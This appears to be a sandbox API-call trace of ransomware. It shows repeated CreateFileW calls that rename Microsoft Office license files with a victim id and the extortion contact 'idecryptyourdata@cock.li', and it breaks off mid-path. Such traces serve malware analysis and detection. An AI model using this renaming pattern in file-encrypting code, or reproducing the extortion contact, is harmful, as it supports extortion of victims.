1 [0163.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.677] CloseHandle (hObject=0x50c) returned 1 [0163.677] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.678] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.678] CloseHandle (hObject=0x50c) returned 1 [0163.679] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.679] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.679] CloseHandle (hObject=0x50c) returned 1 [0163.680] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.680] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.680] CloseHandle (hObject=0x50c) returned 1 [0163.681] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.681] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.682] CloseHandle (hObject=0x50c) returned 1 [0163.682] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.682] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest4-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest4-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.683] CloseHandle (hObject=0x50c) returned 1 [0163.683] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.683] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.684] CloseHandle (hObject=0x50c) returned 1 [0163.684] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.684] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.685] CloseHandle (hObject=0x50c) returned 1 [0163.685] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.685] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.686] CloseHandle (hObject=0x50c) returned 1 [0163.686] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.687] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.687] CloseHandle (hObject=0x50c) returned 1 [0163.688] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.688] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.688] CloseHandle (hObject=0x50c) returned 1 [0163.689] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.689] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.689] CloseHandle (hObject=0x50c) returned 1 [0163.690] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.690] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.690] CloseHandle (hObject=0x50c) returned 1 [0163.691] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.691] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.691] CloseHandle (hObject=0x50c) returned 1 [0163.692] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.692] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.692] CloseHandle (hObject=0x50c) returned 1 [0163.692] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.692] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.693] CloseHandle (hObject=0x50c) returned 1 [0163.693] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.693] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.694] CloseHandle (hObject=0x50c) returned 1 [0163.695] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.695] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.695] CloseHandle (hObject=0x50c) returned 1 [0163.696] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.696] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.696] CloseHandle (hObject=0x50c) returned 1 [0163.697] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.697] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.697] CloseHandle (hObject=0x50c) returned 1 [0163.698] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.698] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.698] CloseHandle (hObject=0x50c) returned 1 [0163.699] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.699] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.699] CloseHandle (hObject=0x50c) returned 1 [0163.700] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.700] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.701] CloseHandle (hObject=0x50c) returned 1 [0163.948] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.948] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial5-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial5-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.949] CloseHandle (hObject=0x514) returned 1 [0163.950] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.950] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.950] CloseHandle (hObject=0x514) returned 1 [0163.951] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.951] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.951] CloseHandle (hObject=0x514) returned 1 [0163.952] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.952] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.952] CloseHandle (hObject=0x514) returned 1 [0163.953] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.953] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.953] CloseHandle (hObject=0x514) returned 1 [0163.954] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.954] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.954] CloseHandle (hObject=0x514) returned 1 [0163.955] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.955] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.955] CloseHandle (hObject=0x514) returned 1 [0163.956] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.956] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.956] CloseHandle (hObject=0x514) returned 1 [0163.957] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.957] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 